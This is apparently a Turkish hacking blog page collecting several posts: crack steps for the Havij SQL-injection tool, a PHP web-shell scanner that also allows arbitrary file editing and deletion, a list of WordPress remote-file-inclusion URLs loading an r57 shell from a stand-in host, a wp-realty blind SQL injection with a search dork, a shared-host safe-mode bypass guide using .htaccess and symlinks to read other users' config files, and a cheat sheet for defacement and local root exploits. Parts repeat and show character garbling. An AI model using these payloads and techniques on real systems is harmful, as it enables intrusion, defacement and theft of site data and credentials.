-
26 Haziran 2015 Cuma
Havij 1.7 PROFESSİONAL SÜRÜM + FULL




Nasıl Kullanılır:

1. Havij 1.17 açıp setup’u yükleyin. 
2. İçindeki loader.exe’yi Havij’in yüklü olduğu klasörün içine atın. 
3. Yönetici olarak loader.exe’yi çalıştırın.
4. Sadece Register’e basın. 
5. İşlem tamam şimdi başlayabilirsiniz.


İNDİRME LİNKLERİ:




DEVAMINI OKU..
Sitede Shell Tarama Scripti


scanner.php diye kaydetip çalıştırın 

PHP Kodu:
<?php/* ###########################################################################?######
# [+] File Name :  Backdoor Scanner
################################################################################?## */
putenv("TZ=Europe/Britania");?><head>
<title>İlleg4lizm Scaner</title>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features)
}
//-->
</script>
<style type="text/css">
<!--
body {
font-family: Tahoma;
color: #CCCCCC;
background-color: #000000;
font-size: 11px;
font-weight: bold;
}
.single{
border: 1px solid #00ff00;
padding: 5px;
}
a:visited {
color: #33333;
font-size: 11px;
font-family: tahoma;
text-decoration: none;
}

a:hover {
color: #ccff00;
text-decoration: none;
}
.abunai {
color: red;
text-decoration: none;
}
.xxx {
color: blue;
text-decoration: none;
}
a {
color: #ccff99;
font-size: 11px;
font-family: tahoma;
text-decoration: none;
}
td {
border-style: solid;
border-width: 0 0 1px 0;
font-size:11px; font-family:Tahoma,Verdana,Arial; color:#ccff99;
}
.me {
font-size:11px; font-family:Tahoma,Verdana,Arial; color:#ccff99;
border: 0px;
padding: 5px;
}
.isi:disabled{
padding: 2px;
border:1px solid #333333;
font-family: Tahoma;
color: #333333;
background-color: #000000;
font-size: 10px;
font-weight: bold;
}
.isi{
padding: 2px;
border:1px solid #666666;
font-family: Tahoma;
color: #ccff99;
background-color: #666666;
font-size: 10px;
font-weight: bold;
}
-->
</style>
<style type="text/css">
#patch {position:absolute; height:1; width:1px; top:0; left:0;}
</style>
</head>
<body>
<center><br><font color="#339900" size="14" face="arial">İlleg4lizm Scanner</font></center><br>
<?phpif(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
if(isset(
$_POST['yes'])){$filename $_GET['file'];
echo 
"<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";unlink($filename);
echo 
"<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
}else{
if(
$_POST['update']) {$filename $_POST['file'];
if(
is_writable($filename)) {$handle fopen($filename"w+");$isi=$_POST['content'];fwrite($handlestripslashes($isi));fclose($handle);$stat"<center><strong>edited successfully<br>";
} else {
$stat"<center><font color=red><strong>Error! File may not be writable.</font></center>";
}
}
if(
$_POST['close']) {
echo 
"<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
}
$filename $_GET['file'];
if (
file_exists($filename)){$vuln $_GET['bug'];$handle fopen($filename"r");$contents fread($handlefilesize($filename));?><center>
<table>
<tr><td align="left"><strong><?=$filename?>  >> Contains : <?=$vuln?></strong></td></tr>
<tr><td>
<form method="post" action="">
<input type="hidden" name="file" value="<?=$filename?>">
<textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea><br>
</td></tr>
<tr><td align="center">
<?phpif($_POST['delete']) {
echo 
"Are you sure to delete ".$filename." ?";?><tr><td align="center">
<input type="submit" name="yes" value=" Y E S ">
<input type="submit" name="no" value=" N O ">
</td></tr>
<?php}else{
echo 
$stat;?></td></tr>
<tr><td align="right">
<input type="submit" name="close" value=" C l o s e ">
<input type="submit" name="delete" value=" D e l e t e ">
<input type="submit" name="update" value=" S a v e ">
</td></tr>
<?php}fclose($handle);?></table>
</form>
<?php}else{
echo 
"<br><br><br><font color=red size=3><b><center>".$filename." not exist...</b></font><br><br><br><br><br><br><br>";
echo 
"<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
}
?></center>
<?php}
}elseif(isset(
$_POST['Submit'])){$ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
foreach(
$ceks as $ceker){
if(
$_POST[$ceker]<>""){$six.=$_POST[$ceker].".";
}
}
$cek explode('.'$six);
function 
ListFiles($dir) {
if(
$dh opendir($dir)) {$files = Array();$inner_files = Array();
while(
$file readdir($dh)) {
if(
$file != "." && $file != ".." && $file[0] != '.') {
if(
is_dir($dir "/" $file)) {$inner_files ListFiles($dir "/" $file);
if(
is_array($inner_files)) $files array_merge($files$inner_files);
}else{
array_push($files$dir "/" $file);
}
}
}
closedir($dh);
return 
$files;
}
}
$target=$_SERVER['DOCUMENT_ROOT'];?><center>
<table border="0" width="90%" cellpadding="5">
<tr>
<td align="right" width="30"><b>No</b></td>
<td align="center" width="105"><b> T y p e </b></td>
<td align="center"><b> F i l e  L o c a t i o n </b></td>
<td align="center" width="150"><b> L a s t  E d i t </b></td>
<td align="right" width="80"><b>F i l e  S i z e</b></td>
</tr><br>
<?phpforeach (ListFiles($target) as $key=>$file){$nFile substr($file, -44);
if(
$nFile == ".php"){
if(
$file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
}else{
$ops = @file_get_contents($file);$op=strtolower($ops);$arr = array('c99_buff_prepare' => 'c 9 9','abcr57' => 'r 5 7');$sis=0;
if(
$op)$size=filesize($file);$last_modified filemtime($file);$last=date("M-d-Y H:i"$last_modified);
foreach(
$arr as $key => $val) {
if(@
preg_match("/$key/"$op)) {$sis=1;$i++;?><tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
<td align="right"><font color="red"><blink><?=$i?></blink></font></td>
<td align="center"><font color="red"><blink><?=$val?></blink></font></td>
<td align="left"><blink>
<a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
</blink></td>
<td align="center"><font color="red"><blink><?=$last?> GMT+9</blink></font></td>
<td align="right"><font color="red"><blink><?=$size?> byte</blink></font></td>
<script language="javascript">
var bgcolor = "transparent";
var change_color = "#444444"
function mover(aa) {
aa.style.backgroundColor = change_color;
}
function mout(aa) {
aa.style.backgroundColor = bgcolor;
}
</script>
</tr>
<?php}
}
if(
$sis<>"1"){
if((@
preg_match("/system\((.*?)\)/"$op))&&(@preg_match("/<pre>/"$op))&&(@preg_match("/empty\((.*?)\)/"$op))) {$sis="2";$i++;$val="hidden shell";?><tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
<td align="right"><font color="blue"><?=$i?></font></td>
<td align="center"><font color="blue"><?=$val?></font></td>
<td align="left">
<a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
</td>
<td align="center"><font color="blue"><?=$last?> GMT+9</font></td>
<td align="right"><font color="blue"><?=$size?> byte</font></td>
<script language="javascript">
var bgcolor = "transparent";
var change_color = "#444444"
function mover(aa) {
aa.style.backgroundColor = change_color;
}
function mout(aa) {
aa.style.backgroundColor = bgcolor;
}
</script>
</tr>
<?php}
}
if(
$sis=="0"){
foreach(
$cek as $bugs) {
if (
$bugs<>""){
if(@
preg_match("/$bugs\((.*?)\)/"$op)) {$i++;?><tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
<td align="right"><?=$i?></td>
<td align="center"><?=$bugs?></td>
<td align="left">
<a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
</td>
<td align="center"><?=$last?> GMT+9</td>
<td align="right"><?=$size?> byte</td>
<script language="javascript">
var bgcolor = "transparent";
var change_color = "#444444"
function mover(aa) {
aa.style.backgroundColor = change_color;
}
function mout(aa) {
aa.style.backgroundColor = bgcolor;
}
</script>
</tr>
<?php}
}
}
}
if(
$_POST['textV']<>""){$text=$_POST['textV'];
if(@
preg_match("/$text/"$op)) {$i++;?><tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
<td align="right"><?=$i?></td>
<td align="center"><?=$text?></td>
<td align="left">
<a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
</td>
<td align="center"><?=$last?> GMT+9</td>
<td align="right"><?=$size?> byte</td>
<script language="javascript">
var bgcolor = "transparent";
var change_color = "#444444"
function mover(aa) {
aa.style.backgroundColor = change_color;
}
function mout(aa) {
aa.style.backgroundColor = bgcolor;
}
</script>
</tr>
<?php}


}
}
}
}
if(
$i==0){
foreach(
$cek as $bugs) {
if (
$bugs<>""){$x++;?><tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
<td align="right"><?=$x?></td>
<td align="center"><?=$bugs?></td>
<td align="center"> not exist </td>
<td align="center"> no record </td>
<td align="right"> -    byte </td>
</tr>
<?php}
}
}
?></table>
<?php}else{$find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');?><form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
<center>
<table width="400" border="1" cellpadding="10">
<tr><td><center>
<b>S e l e c t   s c a n  t y p e :</b><br>
<table width="200">
<tr><td>
<script language="javascript">
function cekKlik(){
if (!document.fCheck.cekV.checked)
document.fCheck.textV.disabled=true;
else
document.fCheck.textV.disabled=false;
if(document.fCheck.cekV.checked){
om = om + 1;
}else{
if(om > 0 ){
om = om - 1;
}else{
om = om;
}
}
if(om != 0){
document.fCheck.Submit.disabled=false;
}else{
document.fCheck.Submit.disabled=true;
}
}
</script>
<?php//dari siniforeach($find as $bug) {?><script language="javascript">
var om = 0;
function checkValue<?=$bug?>(){
if(document.fCheck.<?=$bug?>.checked){
om = om + 1;
}else{
if(om > 0 ){
om = om - 1;
}else{
om = om;
}
}
if(om != 0){
document.fCheck.Submit.disabled=false;
}else{
document.fCheck.Submit.disabled=true;
}
}
</script>
<input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" /> <?=$bug?><br>
<?php}?><input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
<input disabled="disabled" name="textV" value="other key word" onFocus="this.select()" type="text" id="textV">
<br><br>
<input type="hidden" name="asal" value="abcd">
<input disabled="disabled" type="submit" name="Submit" value=" S t a r t  S c a n " />
</td></tr>
</table>
</td></tr></table>
</form>
<?}?><br><br><hr width="300">
<center>
Backdoor Scanner
<br><br>
</body> 



DEVAMINI OKU..
Bazı Rfi Wordpress Açıkları !



Mesaj: #1
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://xx.com/r57.txt?
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://xx.com/r57.txt?
/plugins/spamx/Import.Admin.class.php?_CONF[path]=http://xx.com/r57.txt?
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://xx.com/r57.txt?
/plugins/staticpages/functions.inc?_CONF[path]=http://xx.com/r57.txt?
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://xx.com/r57.txt?
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://xx.com/r57.txt?
/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://xx.com/r57.txt?
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://xx.com/r57.txt?
/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://xx.com/r57.txt?
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://xx.com/r57.txt?

DEVAMINI OKU..
Wordpress WP Realty Plugin - Blind SQL Injection



Kod:
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: illeg4lizm


Link: http://localhost/wordpress/wp-content/plugins/wp-realty/

Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
DEVAMINI OKU..
Linux Server Bypass



S.A. arkadaşlar
bugün sizlere Linux serverlarda yapabileceğimiz ByPass yollarından bir kaçını anlatacağım.

Bildiginiz gibi serverların Safe Mod durumlarında (On) komut çalıştırmak için farklı materyaller kullanırız

Bunlardan en çok kullandığımız Cgi-Telnet ’tir.

Aracımızın dosya uzantısı .pl olduğundan dolayı serverda Active-Perl kurulumu olup online işlem yapması gerekmektedir.

1)Cgi-Telnet’i farklı uzantılarda çalıştırmak.

Cgi-Telnet’i .htaccess ile farklı uzantılar şeklinde çalışarak kurulu olmyan paketten dolayı bypass yöntemine başvururuz.

Uzantıyı (.gif) yapıp çalıştırmak.

/home/illeg4lizm/public_html/ dizininde bu işlemi yapmak için

.htaccess kodu ;

AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif

bu şekilde ki bir .htaccess de telnet’imiz “.pl” olan uzantısı “.gif” yapıp chmod 755 vererek çalıştırabiliriz.

Ve de Telnet’imizde 1. satırda ;

#!/usr/bin/perl
olan betiğimizi ;
“#!/usr/bin/perl -I/usr/local/bandmain” bu şekilde silerek değiştiriniz.

Yukarda verdiğim kodun içeriğini ;

AddType applicationx-httpd-cgi .snl

AddHandler cgi-script .snl
AddHandler cgi-script .snl

bu şekildede değiştirerek “.pl” olan uzantımızı “.snl” şeklindede değiştirebiliriz.

2)”Ln -s” ile Dosyayı Kendi KLasörünüze Çekmek

Yukarda ki gibi Cgi-Telnet imizi çalıştırdıktan sonra

ahmet isimli userin dizininden config dosyasını kendi dizinimize çekmek için

ln -s /home/snl/public_html/config.php /home/illeg4lizm/public_html/snl.txt

şeklinde çekersek dizindeki config.php direk snl.txt içeriğine kopyalanacaktır.

Ln komutunun yetkisinin olmadığı zamanda ?

herhangi bir Linux dağıtılımında /bin klasorunde ln dosyasını

çalıştığınız dizine upload ederek chmod 755 yetkisinden sonra

./ln /home/snl/public_html/config.php /home/illeg4lizm/public_html/snl.txt

şeklindede çekebilirsiniz.

Bu yöntem yanında cat -n komutunuda kullanabilirsiniz.

3)Dizini Direk Çekerek Php Parsed

Şimdi anlatacağım yöntem ise hedef dizinin ana klasörünü direk kendi dizininize çekerek vereceğim .htaccess komudu

ile dizinde Php parsed yaparak dosyayı download ettirmek.

Komut 1;

Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php

Komut 2; .shtml parsed

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

ln -s /home/snl/public_html/ /home/illeg4lizm/public_html/

komutundan sonra çalıştığınız shell in url si

http://orneksite.org ise

http://orneksite.org/config.php url girdiginiz zaman

direk config.php yi masaüstünüze indirebilirsiniz.

4)Dizin’i Görmek

Çektiğiniz klasor ise ve direk çalışmasını istiyorsanız

.htaccess ’inizi

Komut 1;

#deny all access
deny from all

Komut 2;

Options +Indexes +MultiViews +FollowSymlinks

IndexOptions FancyIndexing

Kullanabilirsiniz.

5)Php Versiyon Düşürmek

Serverın Php versiyonunu düşürmek istiyorsanız.

.htccess komutu ;

AddType application/x-httpd-php5 .php

kullanabilirsiniz php4 de çalışan sheller sayasendi safe mod durumunu bypasslıyabilirsiniz.

6)suPHP Kullanarak Dizinde Çalışmayan .htaccess Çalıştırmak.

Çalıştığınız dizinde .htaccess çalışmıyorsa ;

suPHP_ConfigPath /home/illeg4lizm/public_html/php.ini

Şeklinde php.ini nizi çalıştırarak Safe Mod , Disab. Fonk. düşürebilirsiniz.

Bunun gibi bir çok yöntem var ve mantıklarının hepsi birbirine yakındır.

Alıntıdır.

DEVAMINI OKU..
Linux Root Komutları




Chmod = Dosyaya yazım izinleri vermeye yarayan komutumuzdur. Genelde Exploite yazma izni vererek kullanılabilir hale gelmesini sağlar. Örneğin : Chmod 777 dosya ısmı

wget = Bulunulan dizine dosya çekmeye yarar. Genelde index.html ve exploit cekmek için kullanırız. Örneğin 

cd = Bu komut ile klasorler arası geçişi sağlarız. Örneğin : cd /tmp komutu tmp klasorune gitmeye yarar. Genellikle yazma izni olan klasorlere geçiş yapmak için kullanılır.

pwd = Bu komut ile şuan da bulunduğumuz kalsoru öğrenebilirz.

ls -l = Bu komut bulunduğumuz klasordeki dosyaları listeler.

rm -rf = Bu komut ile dizinde bulunan dosyayı silebiliriz. Örneğin : rm -f index.html
perl = perl komutu dizinde bulunan exploiti calıstırmaya yarar. Örneğin : perl mass.pl komutu ile mass.pl adlı exploiti aktif hale gecirerek mass attack yapmış oluruz.

./ = Bu komut ise yazma izni verdiğimiz local exploitimizi calıstırmaya yarar. Chmod 777 localexploitadı ndan sonra kullanacagımız komut. Örneğin : ./RooT

id = Bu komut ise serverda ki yetkimiz hakkında bilgi verir. id yazdığımızda Uid(root) ile başlayan bir satır görüyorsak sunucunun root’u yani sahibi olmuşuz demektir.

uname -a = Bu komut sunucunun bilgilerini verir, Kernel versionunu bu komut ile öğrenerek gerekli localexploiti cekebiliriz…

Serverın list dızınını almak:

cd etc

cd apache, apache2, httpd bu 3 klasorden bırı wardır deneyerek bulucaksınız

ls -la yaptıgınızda genelde eskı serverlarda httpd.conf wardır ki bunu

cat httpd.conf | grip ServerName yazıp sıte lıstı alınırdı…

Mass.pl yı calıstırmak

perl mass.pl /indexinuploadoldugudizin/indexadı.htm

ornek:

perl mass.pl /home/SnL_ayaz_/public_html/index.htm
ben genelde ındexi tmp ye atarım ordan cekmesı daha kolay oluyo sız bılırsınız yınede selametle

zip -r zipady klasörady —-> Dosya Zipleme

Bu komut sayesinde site yedeğinizi hızlı bir şekilde alabilirsiniz yada kötü amaçla kullanmak isterseniz ftpsini ele geçirdiğiniz bir sitenin tüm dosyalaryny çalabilirsiniz.

unzip zipady —-> Zipli Dosyayy Açma

Bu komut ile site yede?inizi yada zip şeklinde upload ettiğiniz portal,forum,resim vs saniyeler içinde hızlyca serverın içinde açabilirsiniz.

cat etc/passwd —-> Passwd Okuma

Hostun passwd dosyasyny okuyarak serverdaki sitelerin klasör isimlerini ö?renmenize yarar.Böylelikle klasör değiştirerek (fopen() komutunun yasaklanmamış ve permissonların 777 olmasy gerekiyor.)

cat etc/passord —-> Passwd Okuma

Üstteki passwd dosyasının ismini bazy hostlar password olarak değiştirdiği için koydum.

cat etc/hosts —-> Hosts Okuma

Host üzerindeki tüm site isimlerinin tutulduğu dosya.

cat etc/host —-> Hosts Okuma

Üstteki hosts dosyasynyn ismini bazy hostlar host olarak değiştirdiği için koydum.

wget -m site.com —-> Tüm siteyi çekmek

Bu komut sayesinde tüm siteyi kolaylykla kendi serverynyza çekebilirsiniz.(NOThp ve asp dosyalary çekmeye çalıimayın çünkü htmlye yansıyan görüntüsünü alırsnız.)Zip rar mp3 vs çekmede 1 e 1

wget dosya.uzanty —-> Dosya Çekmek

Yukardaki komutun sadece dosya çekmesini sa?layan hali.

ls- la —-> Dosya Listeleme

Basit klasör listelemenizi sağlar.

gcc exploit.c -o dosya —-> Exploit Derleme

Exploit derleme komutu

zip -r zipady klasörady —-> Dosya Zipleme

Bu komut sayesinde site yedeğinizi hızlı bir şekilde alabilirsiniz yada kötü amaçla kullanmak isterseniz ftpsini ele geçirdiğiniz bir sitenin tüm dosyalaryny çalabilirsiniz.

unzip zipady —-> Zipli Dosyayy Açma

Bu komut ile site yede?inizi yada zip şeklinde upload ettiğiniz portal,forum,resim vs saniyeler içinde hızlyca serverın içinde açabilirsiniz.

cat etc/passwd —-> Passwd Okuma

Hostun passwd dosyasyny okuyarak serverdaki sitelerin klasör isimlerini ö?renmenize yarar.Böylelikle klasör değiştirerek (fopen() komutunun yasaklanmamış ve permissonların 777 olmasy gerekiyor.)

cat etc/passord —-> Passwd Okuma

Üstteki passwd dosyasının ismini bazy hostlar password olarak değiştirdiği için koydum.

cat etc/hosts —-> Hosts Okuma

Host üzerindeki tüm site isimlerinin tutulduğu dosya.

cat etc/host —-> Hosts Okuma

Üstteki hosts dosyasynyn ismini bazy hostlar host olarak değiştirdiği için koydum.

wget -m site.com —-> Tüm siteyi çekmek

Bu komut sayesinde tüm siteyi kolaylykla kendi serverynyza çekebilirsiniz.(NOThp ve asp dosyalary çekmeye çalıimayın çünkü htmlye yansıyan görüntüsünü alırsnız.)Zip rar mp3 vs çekmede 1 e 1

wget dosya.uzanty —-> Dosya Çekmek

Yukardaki komutun sadece dosya çekmesini sa?layan hali.

ls- la —-> Dosya Listeleme

Basit klasör listelemenizi sağlar.

gcc exploit.c -o dosya —-> Exploit Derleme
DEVAMINI OKU..